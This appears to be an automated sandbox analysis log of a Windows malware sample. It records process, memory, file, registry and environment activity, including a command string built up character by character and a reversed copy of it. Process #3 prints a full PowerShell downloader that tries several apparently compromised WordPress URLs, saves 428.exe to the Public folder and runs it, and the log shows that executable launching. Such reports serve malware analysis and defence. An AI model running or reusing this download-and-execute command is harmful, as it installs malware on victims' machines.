Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-conten	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/b	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5D	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@h	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@ht	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@htt	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http:	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http:/	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://w	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://ww	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://www	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://www.	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://www.v	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://www.vc	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://www.vco	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://www.vcor	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://www.vcors	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://www.vcorse	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://www.vcorset	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://www.vcorset.	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://www.vcorset.c	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://www.vcorset.co	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://www.vcorset.com	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://www.vcorset.com/	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://www.vcorset.com/w	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Documents	1	Fn
Set Environment String	name = zqj8, value = }}{hctac};kaerb;jqj$ metI-ekovnI;)jqj$ ,VTO$(eliFdaolnwoD.VRT${yrt{)pmi$ ni VTO$(hcaerof;'exe.'+FaR$+'\'+cilbup:vne$=jqj$;'824' = FaR$;)'@'(tilpS.'6XLEBdbEFk/moc.seigolonhcetnavda//:ptth@g59QLoG/au.moc.spihcdoow//:ptth@6UrgrTZD/tnetnoc-pw/ri.ca.umhs.udrc//:ptth@FD8vHfL/sdaolpu/tnetnoc-pw/moc.tesrocv.www//:ptth@0gD5e1wb/tnetnoc-pw/di.ca.gnalam-niu.isamraf//:ptth'=pmi$;tneilCbeW.teN tcejbo-wen=VRT$ llehsrewop	1	Fn
Set Environment String	name = 5dUZ, value = !5dUZ!p	1	Fn
Set Environment String	name = 5dUZ, value = !5dUZ!po	1	Fn
Set Environment String	name = 5dUZ, value = !5dUZ!pow	1	Fn
Set Environment String	name = COPYCMD	1	Fn

Process #3: powershell.exe

159

Information	Value
ID	#3
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://www.vcorset.com/wp-content/uploads/LfHv8DF@http://crdu.shmu.ac.ir/wp-content/DZTrgrU6@http://woodchips.com.ua/GoLQ95g@http://advantechnologies.com/kFEbdBELX6'.Split('@');$RaF = '428';$jqj=$env:public+'\'+$RaF+'.exe';foreach($OTV in $imp){try{$TRV.DownloadFile($OTV, $jqj);Invoke-Item $jqj;break;}catch{}}
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:15, Reason: Child Process
Unmonitor	End Time: 00:01:52, Reason: Self Terminated
Monitor Duration	00:00:37

OS Process Information

Information	Value
PID	0xb64
Parent PID	0xb44 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B68 0x B8C 0x B90 0x BC0 0x BD8 0x BDC 0x 848 0x 858 0x 868 0x 11C 0x 180 0x 8C4

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	rw	-
powershell.exe.mui	0x000e0000	0x000e2fff	Memory Mapped File	rw	-
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	rw	-
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	rw	-
pagefile_0x0000000000110000	0x00110000	0x00110fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000120000	0x00120000	0x00120fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000130000	0x00130000	0x00131fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000140000	0x00140000	0x00140fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000150000	0x00150000	0x00151fff	Pagefile Backed Memory	r	-
private_0x0000000000160000	0x00160000	0x0016ffff	Private Memory	rw	-
private_0x0000000000170000	0x00170000	0x0017ffff	Private Memory	rw	-
cversions.2.db	0x00180000	0x00183fff	Memory Mapped File	r	-
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db	0x00190000	0x001affff	Memory Mapped File	r	-
pagefile_0x00000000001b0000	0x001b0000	0x001b0fff	Pagefile Backed Memory	rw	-
cversions.2.db	0x001c0000	0x001c3fff	Memory Mapped File	r	-
private_0x00000000001d0000	0x001d0000	0x0024ffff	Private Memory	rw	-
pagefile_0x0000000000250000	0x00250000	0x0032efff	Pagefile Backed Memory	r	-
private_0x0000000000330000	0x00330000	0x0042ffff	Private Memory	rw	-
private_0x0000000000430000	0x00430000	0x0052ffff	Private Memory	rw	-
pagefile_0x0000000000530000	0x00530000	0x006b7fff	Pagefile Backed Memory	r	-
pagefile_0x00000000006c0000	0x006c0000	0x00840fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000850000	0x00850000	0x01c4ffff	Pagefile Backed Memory	r	-
private_0x0000000001c50000	0x01c50000	0x01d4ffff	Private Memory	rw	-
private_0x0000000001d50000	0x01d50000	0x01dcffff	Private Memory	rw	-
pagefile_0x0000000001dd0000	0x01dd0000	0x01dd0fff	Pagefile Backed Memory	r	-
pagefile_0x0000000001de0000	0x01de0000	0x01de2fff	Pagefile Backed Memory	rw	-
private_0x0000000001df0000	0x01df0000	0x01e6ffff	Private Memory	rw	-
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db	0x01e70000	0x01e9ffff	Memory Mapped File	r	-
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x01ea0000	0x01f05fff	Memory Mapped File	r	-
private_0x0000000001f10000	0x01f10000	0x01f8ffff	Private Memory	rwx	-
sortdefault.nls	0x01f90000	0x0225efff	Memory Mapped File	r	-
private_0x0000000002260000	0x02260000	0x0235ffff	Private Memory	rw	-
pagefile_0x0000000002360000	0x02360000	0x02360fff	Pagefile Backed Memory	rw	-
private_0x0000000002370000	0x02370000	0x0237ffff	Private Memory	rw	-
private_0x0000000002380000	0x02380000	0x0239ffff	Private Memory	-	-
private_0x00000000023a0000	0x023a0000	0x0241ffff	Private Memory	rw	-
pagefile_0x0000000002420000	0x02420000	0x02812fff	Pagefile Backed Memory	r	-
l_intl.nls	0x02820000	0x02822fff	Memory Mapped File	r	-
private_0x0000000002830000	0x02830000	0x02830fff	Private Memory	rw	-
sorttbls.nlp	0x02840000	0x02844fff	Memory Mapped File	r	-
sortkey.nlp	0x02850000	0x02890fff	Memory Mapped File	r	-
microsoft.wsman.runtime.dll	0x028a0000	0x028a7fff	Memory Mapped File	rwx	-
pagefile_0x00000000028b0000	0x028b0000	0x028b0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000028c0000	0x028c0000	0x028c0fff	Pagefile Backed Memory	r	-
private_0x00000000028d0000	0x028d0000	0x0294ffff	Private Memory	rw	-
private_0x0000000002970000	0x02970000	0x029effff	Private Memory	rw	-
kernelbase.dll.mui	0x029f0000	0x02aaffff	Memory Mapped File	rw	-
private_0x0000000002ab0000	0x02ab0000	0x02b2ffff	Private Memory	rwx	-
private_0x0000000002b30000	0x02b30000	0x02c30fff	Private Memory	rw	-
system.transactions.dll	0x02c40000	0x02c85fff	Memory Mapped File	r	-
mscorrc.dll	0x02c40000	0x02c93fff	Memory Mapped File	r	-
private_0x0000000002d00000	0x02d00000	0x02d0ffff	Private Memory	rw	-
private_0x0000000002d10000	0x02d10000	0x1ad0ffff	Private Memory	rw	-
private_0x000000001ad10000	0x1ad10000	0x1b3dffff	Private Memory	rw	-
private_0x000000001b420000	0x1b420000	0x1b49ffff	Private Memory	rw	-
system.management.automation.dll	0x1b4a0000	0x1b781fff	Memory Mapped File	rwx	-
private_0x000000001b790000	0x1b790000	0x1b88ffff	Private Memory	rw	-
system.transactions.dll	0x1e230000	0x1e278fff	Memory Mapped File	rwx	-
msvcr80.dll	0x74ed0000	0x74f98fff	Memory Mapped File	rwx	-
user32.dll	0x77230000	0x77329fff	Memory Mapped File	rwx	-
kernel32.dll	0x77330000	0x7744efff	Memory Mapped File	rwx	-
ntdll.dll	0x77450000	0x775f8fff	Memory Mapped File	rwx	-
psapi.dll	0x77620000	0x77626fff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
powershell.exe	0x13fb50000	0x13fbc6fff	Memory Mapped File	rwx	-
culture.dll	0x642ff4a0000	0x642ff4a9fff	Memory Mapped File	rwx	-
system.directoryservices.ni.dll	0x7feddbc0000	0x7feddd54fff	Memory Mapped File	rwx	-
system.management.ni.dll	0x7feddd60000	0x7feddecbfff	Memory Mapped File	rwx	-
system.xml.ni.dll	0x7fedded0000	0x7fede574fff	Memory Mapped File	rwx	-
microsoft.powershell.security.ni.dll	0x7fede580000	0x7fede5bdfff	Memory Mapped File	rwx	-
microsoft.powershell.commands.management.ni.dll	0x7fede5c0000	0x7fede6d7fff	Memory Mapped File	rwx	-
microsoft.powershell.commands.utility.ni.dll	0x7fede6e0000	0x7fede8f5fff	Memory Mapped File	rwx	-
system.transactions.ni.dll	0x7fede900000	0x7fede9e4fff	Memory Mapped File	rwx	-
microsoft.wsman.management.ni.dll	0x7fede9f0000	0x7fedea99fff	Memory Mapped File	rwx	-
system.configuration.install.ni.dll	0x7fedeaa0000	0x7fedead1fff	Memory Mapped File	rwx	-
microsoft.powershell.commands.diagnostics.ni.dll	0x7fedeae0000	0x7fedeb48fff	Memory Mapped File	rwx	-
system.core.ni.dll	0x7fedeb50000	0x7fedee7dfff	Memory Mapped File	rwx	-
system.management.automation.ni.dll	0x7fedee80000	0x7fedf9dcfff	Memory Mapped File	rwx	-
microsoft.powershell.consolehost.ni.dll	0x7fedf9e0000	0x7fedfa91fff	Memory Mapped File	rwx	-
system.ni.dll	0x7fedfaa0000	0x7fee04c2fff	Memory Mapped File	rwx	-
mscorlib.ni.dll	0x7fee05e0000	0x7fee14bbfff	Memory Mapped File	rwx	-
mscorwks.dll	0x7fee14c0000	0x7fee1e5cfff	Memory Mapped File	rwx	-
shfolder.dll	0x7fee3530000	0x7fee3536fff	Memory Mapped File	rwx	-
mscoreei.dll	0x7fee52f0000	0x7fee5388fff	Memory Mapped File	rwx	-
mscoree.dll	0x7fee5390000	0x7fee53fefff	Memory Mapped File	rwx	-
linkinfo.dll	0x7fef8650000	0x7fef865bfff	Memory Mapped File	rwx	-
shdocvw.dll	0x7fef8660000	0x7fef8693fff	Memory Mapped File	rwx	-
ntshrui.dll	0x7fef8be0000	0x7fef8c5ffff	Memory Mapped File	rwx	-
cscapi.dll	0x7fef8c60000	0x7fef8c6efff	Memory Mapped File	rwx	-
apphelp.dll	0x7fefa3d0000	0x7fefa426fff	Memory Mapped File	rwx	-
slc.dll	0x7fefaf40000	0x7fefaf4afff	Memory Mapped File	rwx	-
atl.dll	0x7fefaf70000	0x7fefaf88fff	Memory Mapped File	rwx	-
ntmarta.dll	0x7fefb310000	0x7fefb33cfff	Memory Mapped File	rwx	-
uxtheme.dll	0x7fefbbb0000	0x7fefbc05fff	Memory Mapped File	rwx	-
comctl32.dll	0x7fefbc60000	0x7fefbe53fff	Memory Mapped File	rwx	-
propsys.dll	0x7fefc160000	0x7fefc28bfff	Memory Mapped File	rwx	-
version.dll	0x7fefc560000	0x7fefc56bfff	Memory Mapped File	rwx	-
userenv.dll	0x7fefc740000	0x7fefc75dfff	Memory Mapped File	rwx	-
rsaenh.dll	0x7fefc990000	0x7fefc9d6fff	Memory Mapped File	rwx	-
cryptsp.dll	0x7fefcc90000	0x7fefcca6fff	Memory Mapped File	rwx	-
srvcli.dll	0x7fefd190000	0x7fefd1b2fff	Memory Mapped File	rwx	-
cryptbase.dll	0x7fefd290000	0x7fefd29efff	Memory Mapped File	rwx	-
profapi.dll	0x7fefd3a0000	0x7fefd3aefff	Memory Mapped File	rwx	-
devobj.dll	0x7fefd450000	0x7fefd469fff	Memory Mapped File	rwx	-
cfgmgr32.dll	0x7fefd680000	0x7fefd6b5fff	Memory Mapped File	rwx	-
kernelbase.dll	0x7fefd6c0000	0x7fefd72afff	Memory Mapped File	rwx	-
oleaut32.dll	0x7fefd8a0000	0x7fefd976fff	Memory Mapped File	rwx	-
ole32.dll	0x7fefd980000	0x7fefdb82fff	Memory Mapped File	rwx	-
msctf.dll	0x7fefdb90000	0x7fefdc98fff	Memory Mapped File	rwx	-
sechost.dll	0x7fefdca0000	0x7fefdcbefff	Memory Mapped File	rwx	-
shell32.dll	0x7fefdcc0000	0x7fefea47fff	Memory Mapped File	rwx	-
setupapi.dll	0x7fefead0000	0x7fefeca6fff	Memory Mapped File	rwx	-
shlwapi.dll	0x7fefecb0000	0x7fefed20fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x7fefed30000	0x7fefee5cfff	Memory Mapped File	rwx	-
imm32.dll	0x7fefee60000	0x7fefee8dfff	Memory Mapped File	rwx	-
usp10.dll	0x7fefee90000	0x7fefef58fff	Memory Mapped File	rwx	-
msvcrt.dll	0x7fefef60000	0x7fefeffefff	Memory Mapped File	rwx	-
wldap32.dll	0x7feff000000	0x7feff051fff	Memory Mapped File	rwx	-
advapi32.dll	0x7feff470000	0x7feff54afff	Memory Mapped File	rwx	-
lpk.dll	0x7feff5f0000	0x7feff5fdfff	Memory Mapped File	rwx	-
gdi32.dll	0x7feff600000	0x7feff666fff	Memory Mapped File	rwx	-
clbcatq.dll	0x7feff6c0000	0x7feff758fff	Memory Mapped File	rwx	-
apisetschema.dll	0x7feff770000	0x7feff770fff	Memory Mapped File	rwx	-
private_0x000007ff00020000	0x7ff00020000	0x7ff0002ffff	Private Memory	-	-
private_0x000007ff00030000	0x7ff00030000	0x7ff0003ffff	Private Memory	-	-
private_0x000007ff00040000	0x7ff00040000	0x7ff000dffff	Private Memory	-	-
private_0x000007ff000e0000	0x7ff000e0000	0x7ff000effff	Private Memory	-	-
private_0x000007ff000f0000	0x7ff000f0000	0x7ff0015ffff	Private Memory	-	-
private_0x000007ff00160000	0x7ff00160000	0x7ff0016ffff	Private Memory	-	-
private_0x000007ff00170000	0x7ff00170000	0x7ff0017ffff	Private Memory	-	-
private_0x000007fffff10000	0x7fffff10000	0x7fffff1ffff	Private Memory	rwx	-
private_0x000007fffff20000	0x7fffff20000	0x7fffffaffff	Private Memory	rwx	-
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	r	-
private_0x000007fffffd3000	0x7fffffd3000	0x7fffffd4fff	Private Memory	rw	-
private_0x000007fffffd5000	0x7fffffd5000	0x7fffffd6fff	Private Memory	rw	-
private_0x000007fffffd7000	0x7fffffd7000	0x7fffffd8fff	Private Memory	rw	-
private_0x000007fffffd9000	0x7fffffd9000	0x7fffffdafff	Private Memory	rw	-
private_0x000007fffffdb000	0x7fffffdb000	0x7fffffdcfff	Private Memory	rw	-
private_0x000007fffffdd000	0x7fffffdd000	0x7fffffdefff	Private Memory	rw	-
private_0x000007fffffdf000	0x7fffffdf000	0x7fffffdffff	Private Memory	rw	-
For performance reasons, the remaining 74 entries are omitted. The remaining entries can be found in flog.txt.

Host Behavior

File (13)

Operation	Filename	Additional Information	Count	Logfile
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll	type = file_attributes	2	Fn
Get Info	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config	type = file_attributes	2	Fn
Get Info	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config	type = file_type	2	Fn
Get Info	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config	type = size, size_out = 0	1	Fn
Get Info	C:\Users\Public\428.exe	type = file_attributes	1	Fn
Open	STD_INPUT_HANDLE	-	1	Fn
Read	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config	size = 4096, size_out = 4096	1	Fn Data

Registry (15)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	-	1	Fn
Open Key	HKEY_CURRENT_USER	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	-	1	Fn
Read Value	-	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Read Value	-	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	value_name = InstallationType, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	value_name = InstallationType, data = Client, type = REG_SZ	1	Fn
Read Value	-	value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	-	value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	-	value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Users\Public\428.exe	show_window = SW_SHOWNORMAL		1	Fn

Module (4)

Operation	Module	Additional Information	Count	Logfile
Get Filename	-	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
Get Filename	-	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260	1	Fn
Create Mapping	-	filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072	1	Fn
Map	-	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE	1	Fn

User (1)

Operation	Additional Information	Success	Count	Logfile
Lookup Privilege	privilege = SeDebugPrivilege, luid = 20		1	Fn

System (7)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = YKYD69Q	1	Fn
Get Info	type = Operating System	5	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn

Mutex (15)

Operation	Additional Information	Count	Logfile
Create	mutex_name = Global\.net clr networking	1	Fn
Create	mutex_name = Global\.net clr networking	1	Fn
Create	mutex_name = Global\.net clr networking	5	Fn
Open	mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE	1	Fn
Release	mutex_name = Global\.net clr networking	1	Fn
Release	mutex_name = Global\.net clr networking	1	Fn
Release	mutex_name = Global\.net clr networking	5	Fn

Environment (41)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	name = MshEnableTrace		39	Fn
Get Environment String	name = public, result_out = C:\Users\Public		2	Fn

Process #4: 428.exe

266

Information	Value
ID	#4
File Name	c:\users\public\428.exe
Command Line	"C:\Users\Public\428.exe"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:50, Reason: Child Process
Unmonitor	End Time: 00:01:57, Reason: Self Terminated
Monitor Duration	00:00:07

OS Process Information

Information	Value
PID	0x8d4
Parent PID	0xb64 (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 940

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001a0000	0x001a0000	0x001a1fff	Pagefile Backed Memory	r	-
locale.nls	0x001b0000	0x00216fff	Memory Mapped File	r	-
pagefile_0x0000000000220000	0x00220000	0x00226fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	rw	-
msvfw32.dll.mui	0x00240000	0x00241fff	Memory Mapped File	rw	-
pagefile_0x0000000000250000	0x00250000	0x00251fff	Pagefile Backed Memory	r	-
private_0x0000000000260000	0x00260000	0x00275fff	Private Memory	rw	-
private_0x0000000000280000	0x00280000	0x00296fff	Private Memory	rwx	-
private_0x00000000002a0000	0x002a0000	0x002affff	Private Memory	rwx	-
private_0x00000000002b0000	0x002b0000	0x002bffff	Private Memory	rw	-
private_0x00000000002c0000	0x002c0000	0x002cffff	Private Memory	rw	-
pagefile_0x00000000002c0000	0x002c0000	0x002c6fff	Pagefile Backed Memory	rw	-
private_0x00000000002d0000	0x002d0000	0x0034ffff	Private Memory	rw	-
private_0x0000000000350000	0x00350000	0x00366fff	Private Memory	rw	-
pagefile_0x0000000000370000	0x00370000	0x00376fff	Pagefile Backed Memory	rw	-
private_0x00000000003b0000	0x003b0000	0x003bffff	Private Memory	rw	-
428.exe	0x00400000	0x0045dfff	Memory Mapped File	rwx	-
private_0x0000000000460000	0x00460000	0x0051ffff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x0067ffff	Private Memory	rw	-
pagefile_0x0000000000680000	0x00680000	0x00807fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000810000	0x00810000	0x00990fff	Pagefile Backed Memory	r	-
pagefile_0x00000000009a0000	0x009a0000	0x01d9ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001da0000	0x01da0000	0x02192fff	Pagefile Backed Memory	r	-
private_0x00000000021a0000	0x021a0000	0x0229ffff	Private Memory	rw	-
sortdefault.nls	0x022a0000	0x0256efff	Memory Mapped File	r	-
